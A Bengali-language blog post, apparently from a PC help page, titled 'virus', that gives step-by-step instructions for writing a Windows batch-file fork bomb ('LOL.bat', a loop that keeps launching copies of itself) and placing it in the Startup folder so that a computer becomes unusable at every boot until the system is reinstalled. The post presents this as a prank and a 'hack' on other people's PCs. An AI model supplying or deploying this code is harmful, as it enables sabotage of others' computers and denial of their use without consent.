virus
virus

পরম করুনাময় আল্লাহ্ এর নামে শুরু করলাম

 

আসসালামু আলাকুম, কেমন আছেন সবাই? আশা করি ভালই আছেন, আমি ও আমরা আপনাদের দোয়ায় এবং আল্লাহ্র অশেষ রহমতে অনেক ভাল আছি। তবে আর কথা বাড়িয়ে লাভ কি? বেশি কথা না বাড়িয়ে কাজের কথায় আসি।

ট্রিকসটি শেখার আগে একটা কথা এটা যখন প্রথম আমার নিযের পিসিতে বানিয়ে চালু করি (আমি জানতাম যে এটা পিসির কোন ক্ষতি করবে না)

তারপরও একটু ভয়ের কাজ

নোটপ্যাড ওপেন করুন।
নিম্নলিখিত কোডটি কপি পেষ্ট বা টাইপ করুন।
::LOL.bat
:s
start %0 “LOL.bat”
goto s

এবার সেইভ করুন File>Save as>file type>All> আর সেইভ করুন যে কোন সামে এবং নামের পরে দিন .bat ফরমেটে সেইভ করুন।

এরপরে ফাইলটি ডাবল ক্লিক করুন আর দেখুন কি হইতেছে।

এটা দিয়ে উপরের মত মজা তো করতে পারবেন সাথে বড় আকারের একটা হ্যাকও করতে পারবেন।
যে ভাবে করবেন –
LOL.bat ফাইলটি কাট করে startup folder গিয়ে পেষ্ট করতে হবে।

এবার থেকে যখনই পিসি চালু করবে অটোমেটিক ভাবে কাটা চামচ বোমা চালু হয়ে যাবে।তারপর যতক্ষণ আর ঐ পিসিতে নতুন করে XP সেটাপ না দেয়া হবে ততক্ষণ পর্যন্ত কোন কাজ করতে পারবে না।

 

ভাল লাগলে কমেন্টে জানাতে ভুলবে না…

ভুলে ভরা জীবনে ভুল হওয়াটা অসম্ভব কিছু নয়,যদি আমার লেখার মাঝে কোন ভুলত্রুটি থাকে ক্ষমার দৃষ্টিতে দেখবেন। ধন্যবাদ সবাই ভাল থাকবেন।

আপনার কম্পিউটার সমস্যা সমাধানে আমরা আছি ফেইজবুকে: পিসি হেল্প সেন্টার

আমাদের সাইটের সকল পোষ্ট আপনার ফেসবুকের ওয়ালে পেতে পেজ লাইক করুন (পিসি হেল্প সেন্টার)